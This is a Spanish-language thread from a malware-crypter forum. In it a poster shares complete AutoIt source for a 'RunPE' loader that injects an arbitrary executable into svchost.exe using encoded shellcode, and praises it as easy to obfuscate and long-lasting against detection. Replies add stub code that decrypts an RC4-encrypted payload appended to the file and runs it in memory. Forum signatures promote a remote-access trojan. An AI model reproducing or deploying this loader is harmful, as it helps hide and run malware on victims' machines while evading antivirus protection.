Buenas , los dejo este Runpe hecho en AutoIt para que disfruteis , ya que no tienem muchos por ay .....

"Regalo del nacimiento de Mi Hija Isabella"

Se agrega en svchost.exe para cargar en la memoria e és muy facil de ofuscar , asi que creo durará mucho ....

Saludos e comentem se tienem duda


Código: Seleccionar todo


;=================================================
; AutoIt RunExeFromMemory ( ShellCode )
; Autor : M3
; Creditos a : Hamavb , IcodeInVb6 , Pink (Udtools.net) , Ward
; Proposito : Correr Ejecutable en la Memoria
; Testeado en : XP SP3 | Vista | W7 32 | 64
; Uso : RunExeFromMemory(Binary)
;=================================================


Local $sBinary = FileOpenDialog("Elija tu Servidor para Ejecutar en la Memoria", "", "Archivos exe (*.exe)")

Call ( RunExeFromMemory(Fileread($sBinary)))





Func RunExeFromMemory($Binary)

    Global $Memory ,  $FileBuffer

	$Memory = DllStructCreate("Boolean[" & sReadBytes(sShellCode()) & "]")
	$FileBuffer = DllStructCreate("Boolean[" & sReadBytes($Binary) & "]")
	DllStructSetData($Memory, 1, sShellRead(sShellCode()))
	DllStructSetData($FileBuffer, 1, $Binary)

	Call ( CWPA( sStructBuffer(), sInjectMyApp(), sStructBin(), False, False ))

EndFunc




Func sStructBuffer()

	Local $Ret = DllStructGetPtr($Memory)
    Return $Ret

EndFunc




Func sStructBin()

	Local $Ret2 = DllStructGetPtr($FileBuffer)
    Return $Ret2

EndFunc





Func CWPA($lpPrevWndFunc, $hWnd, $Msg, $wParam, $lParam)

	Local $Return
	$Return = DllCall("User32", "none", "CallWindowProcA", "ptr", $lpPrevWndFunc, "wstr", $hWnd, "ptr", $Msg, "int", $wParam, "int", $lParam)

EndFunc






Func sInjectMyApp()

	Local $sInject = @SystemDir & "\svchost.exe"
	Return $sInject

EndFunc





Func sShellCode ()

   Local $Buffer
	     $Buffer = "0x" & "3078363045383445303030303030364230303635303037323030364530303635303036433030333330303332303030303030364530303734303036343030364" & _
	"33030364330303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030" & _
	"30303030303030303030303030303030303030303030303030303030303030303542384246433641343245384242303330303030384235343234323838393131384235343234324336413" & _
	"34545384141303330303030383931313641344145384131303330303030383933393641314536413343453839443033303030303641323236384634303030303030453839313033303030" & _
	"30364132363641323445383838303330303030364132413641343045383746303330303030364132453641304345383736303330303030364133323638433830303030303045383641303" & _
	"33030303036413241453835433033303030303842303943373031343430303030303036413132453834443033303030303638354245383134434635314538373930333030303036413345" & _
	"45383342303330303030384244313641314545383332303330303030364134304646333246463331464644303641313245383233303330303030363835424538313443463531453834463" & _
	"03330303030364131454538313130333030303038423039384235313343364133454538303530333030303038423339303346413641323245384641303230303030384230393638463830" & _
	"30303030303537353146464430364130304538453830323030303036383838464542333136353145383134303330303030364132454538443630323030303038423339364132414538434" & _
	"43032303030303842313136413432453843343032303030303537353236413030364130303641303436413030364130303641303036413030464633314646443036413132453841393032" & _
	"30303030363844303337313046323531453844353032303030303641323245383937303230303030384231313641324545383845303230303030384230394646373233344646333146464" & _
	"43036413030453837453032303030303638394339353141364535314538414130323030303036413232453836433032303030303842313138423339364132454538363130323030303038" & _
	"42303936413430363830303330303030304646373235304646373733344646333146464430364133364538343730323030303038424431364132324538334530323030303038423339364" & _
	"13345453833353032303030303842333136413232453832433032303030303842303136413245453832333032303030303842303935324646373735343536464637303334464633313641" & _
	"30304538313030323030303036384131364133444438353145383343303230303030383343343043464644303641313245384639303130303030363835424538313443463531453832353" & _
	"03230303030364132324538453730313030303038423131383343323036364133414538444230313030303036413032353235314646443036413336453843453031303030304337303130" & _
	"30303030303030423832383030303030303641333645384243303130303030463732313641314545384233303130303030384231313842353233433831433246383030303030303033443" & _
	"03641334545383946303130303030303331313641323645383936303130303030364132383532464633313641313245383841303130303030363835424538313443463531453842363031" & _
	"30303030383343343043464644303641323645383733303130303030384233393842303938423731313436413345453836353031303030303033333136413236453835433031303030303" & _
	"84230393842353130433641323245383530303130303030384230393033353133343641343645383434303130303030384243313641324545383342303130303030384230393530464637" & _
	"37313035363532464633313641303045383241303130303030363841313641334444383531453835363031303030303833433430434646443036413336453831333031303030303842313" & _
	"13833433230313839313136413341453830353031303030303842303933424341304638353333464646464646364133324538463430303030303038423039433730313037303030313030" & _
	"36413030453845353030303030303638443243374137363835314538313130313030303036413332453844333030303030303842313136413245453843413030303030303842303935324" & _
	"64637313034464644303641323245384242303030303030384233393833433733343641333245384146303030303030384233313842423641343030303030303833433630383641324545" & _
	"38394430303030303038423131364134364538393430303030303035313641303435373536464633323641303045383836303030303030363841313641334444383531453842323030303" & _
	"03030383343343043464644303641323245383646303030303030384230393842353132383033353133343641333245383630303030303030384230393831433142303030303030303839" & _
	"31313641303045383446303030303030363844334337413745383531453837423030303030303641333245383344303030303030384244313641324545383334303030303030384230394" & _
	"64633324646373130344646443036413030453832343030303030303638383833463441394535314538353030303030303036413245453831323030303030303842303946463731303446" & _
	"46443036413441453830343030303030303842323136314333384243423033344332343034433336413030453846324646464646463638353443414146393135314538314530303030303" & _
	"03641343036383030313030303030464637343234313836413030464644304646373432343134453843464646464646463839303138334334313043334538323230303030303036384134" & _
	"34453045454335304538344230303030303038334334303846463734323430344646443046463734323430383530453833383030303030303833433430384333353535323531353335363" & _
	"53733334330363438423730333038423736304338423736314338423645303838423745323038423336333834373138373546333830334636423734303738303346344237343032454245" & _
	"37384243353546354535423539354135444333353535323531353335363537384236433234314338354544373434333842343533433842353432383738303344353842344131383842354" & _
	"13230303344444533333034393842333438423033463533334646333343304643414338344330373430374331434630443033463845424634334237433234323037354531384235413234" & _
	"3033444436363842304334423842354131433033444438423034384230334335354635453542353935413544433343333030303030303030"

	Return $Buffer

EndFunc




Func sShellRead($sData)

    Local $sValue

	For $i = 1 To sReadBytes($sData)
        $sValue &= Chr(sValue(BinaryMid($sData , $i , 1)))
    Next

	Return $sValue

EndFunc





Func sReadBytes($Data)

	Local $Value = BinaryLen($Data)
	Return $Value

EndFunc





Func sValue($Value)

    Local $Result = Execute($Value)
    Return Number($Result)

EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
Como debería de llamar a este RunPe M3 ? Por ejemplo con este Sub Main : Creado por ti ..

Código: Seleccionar todo

Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $sKey = "\\BYM3\\"
	  $AppExe = $sAppPath
	  $sArquive = FileRead($sAppPath)
	  $sParams = StringInstr($sArquive, $sKey)
	  $sLen = $sParams + sLenEx ($sKey)
	  $sArquive = StringMid($sArquive,  $sLen)
	  Call (_RunPE(_RC4($sArquive, $sKey)))

    EndFunc
Malware = 00011B
K7 escribió:Como debería de llamar a este RunPe M3 ? Por ejemplo con este Sub Main : Creado por ti ..

Código: Seleccionar todo

Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $sKey = "\\BYM3\\"
	  $AppExe = $sAppPath
	  $sArquive = FileRead($sAppPath)
	  $sParams = StringInstr($sArquive, $sKey)
	  $sLen = $sParams + sLenEx ($sKey)
	  $sArquive = StringMid($sArquive,  $sLen)
	  Call (_RunPE(_RC4($sArquive, $sKey)))

    EndFunc
Si con ese puedes llamarlo.

saludos
Imagen
exacto como disses Pink ... see , lo podes

aca te dejo otro ejemplo se te sirve:

Código: Seleccionar todo

Func SubMain()

	  $sAppPath = @ScriptFullPath
	  $Delim= "\\\\"
	  $sAPP = FileRead($sAppPath)
	  $sSplit = StringSplit($sAPP, $Delim, 1)
     Call (RunExeFromMemory(sRC4($sSplit[2] ,"PassWordxD")))


EndFunc
Indetectables RAT v.0.9.5

@Indetectables Team
Muy bueno tío, segid dandole duro al AutoIt.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
Se agradece , queria usar tu RunPe pero sin la injeccion en svchost, osea sin inyectarse, podrías ayudarme?
M3 escribió:
Elargrt escribió:Se agradece , queria usar tu RunPe pero sin la injeccion en svchost, osea sin inyectarse, podrías ayudarme?

Canbia el svchost por otro , sin injectarse no ay como , puedes usar la propria ruta del exe tanbiem


te dejo estes por si las moscas

http://indetectables.net/viewtopic.php?f=100&t=48430
http://indetectables.net/viewtopic.php?f=100&t=45679

saludo
si ,trate de usar la ruta del exe que se va a ejecutar y no funciona, igual gracias.
Te quedo de a madres amigo,muchas gracias por compartirlo. Saludos
CryptoSharex.com  | Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
Gracias compas

Elargrt
Quizas sea el archivo que esta utilizando no ? Injectando en Svchost te anda y en la ruta del EXE no ???

Todavia suerte compadre
Indetectables RAT v.0.9.5

@Indetectables Team
M3 escribió:Gracias compas

Elargrt
Quizas sea el archivo que esta utilizando no ? Injectando en Svchost te anda y en la ruta del EXE no ???

Todavia suerte compadre

Injectando en Svchost anda perfecto, pero usando la ruta del EXE no sirve
Me Yo lo compile con el autoit,me abre le pongo el exe a usar y cuando empieza el script me deja de funcionar y cierra? alguna sugerencia?
CryptoSharex.com  | Aceptando donaciones..gracias: 1CiVFiGwCtf1kpASyQB9j8dhNyJs5AfaMX
n0z escribió:Me Yo lo compile con el autoit,me abre le pongo el exe a usar y cuando empieza el script me deja de funcionar y cierra? alguna sugerencia?

Que version de autoit utilizas ? usa la version 3.3.8.1


Elargrt

Quizas sea tu archivo , proba com otro a ver se te da lo mismo

Suerte compa
Indetectables RAT v.0.9.5

@Indetectables Team
Responder

Volver a “Otros lenguajes de Scripting”